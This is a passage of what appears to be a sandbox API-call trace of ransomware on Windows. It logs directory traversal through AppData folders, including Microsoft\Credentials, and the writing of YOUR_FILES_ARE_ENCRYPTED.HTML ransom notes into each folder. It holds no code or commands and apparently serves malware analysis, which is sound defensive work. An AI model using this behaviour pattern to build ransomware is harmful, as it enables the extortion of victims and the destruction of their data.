GetFileSizeEx (in: hFile=0x5fc, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=0) returned 1 [0171.018] CloseHandle (hObject=0x5fc) returned 1 [0171.018] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x921a91fa, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 0 [0171.018] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0171.018] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0171.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600 [0171.019] WriteFile (in: hFile=0x600, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0171.021] CloseHandle (hObject=0x600) returned 1 [0171.022] GetProcessHeap () returned 0x270000 [0171.023] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0171.023] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, 
ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0171.023] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files") returned 59 [0171.023] GetProcessHeap () returned 0x270000 [0171.023] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0171.023] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files" [0171.023] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*" [0171.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x921a91fa, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff373816, dwReserved1=0xffffffff, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="\x08ݩ")) returned 0xffffffff [0171.024] GetProcessHeap () returned 0x270000 [0171.025] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) 
returned 1 [0171.025] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1763913d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1763913d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1763913d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0171.025] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.025] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0171.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.026] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.028] CloseHandle (hObject=0x5f8) returned 1 [0171.028] GetProcessHeap () returned 0x270000 [0171.029] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.029] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, 
ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0171.029] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow") returned 37 [0171.029] GetProcessHeap () returned 0x270000 [0171.029] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.029] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow" [0171.029] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*" [0171.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.030] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 
[0171.030] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.030] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.030] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0171.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\locallow\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.031] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.033] CloseHandle (hObject=0x5f8) returned 1 [0171.033] GetProcessHeap () returned 0x270000 [0171.034] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.034] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Roaming", cAlternateFileName="")) returned 1 [0171.034] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming") returned 36 [0171.034] GetProcessHeap () returned 0x270000 [0171.034] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.034] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming" [0171.035] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*" [0171.035] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.036] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.036] FindNextFileW (in: hFindFile=0x42f3180, 
lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0171.036] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities") returned 47 [0171.036] GetProcessHeap () returned 0x270000 [0171.036] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0171.037] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities" [0171.037] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*" [0171.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0171.037] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.037] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", cAlternateFileName="{B85DC~1")) returned 1 [0171.037] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}") returned 86 [0171.037] GetProcessHeap () returned 0x270000 [0171.037] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.037] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}" [0171.037] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*") 
returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*" [0171.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.038] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.038] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.038] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.038] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0171.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\{b85dca4a-5c21-4ec5-af48-a2a88cd3d1d9}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.039] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.041] CloseHandle (hObject=0x5fc) returned 1 [0171.041] GetProcessHeap () returned 0x270000 [0171.042] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.042] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", cAlternateFileName="{B85DC~1")) returned 0 [0171.043] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0171.043] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0171.043] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Identities\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600 [0171.044] WriteFile (in: hFile=0x600, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0171.046] CloseHandle (hObject=0x600) returned 1 [0171.046] GetProcessHeap () returned 0x270000 [0171.047] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0171.047] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0171.047] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned 46 [0171.048] GetProcessHeap () returned 0x270000 [0171.048] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0171.048] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft" [0171.048] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft", lpString2="\\*" | 
out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*" [0171.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0171.051] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.051] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0171.051] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials") returned 58 [0171.051] GetProcessHeap () returned 0x270000 [0171.051] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.051] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials" [0171.051] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0171.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, 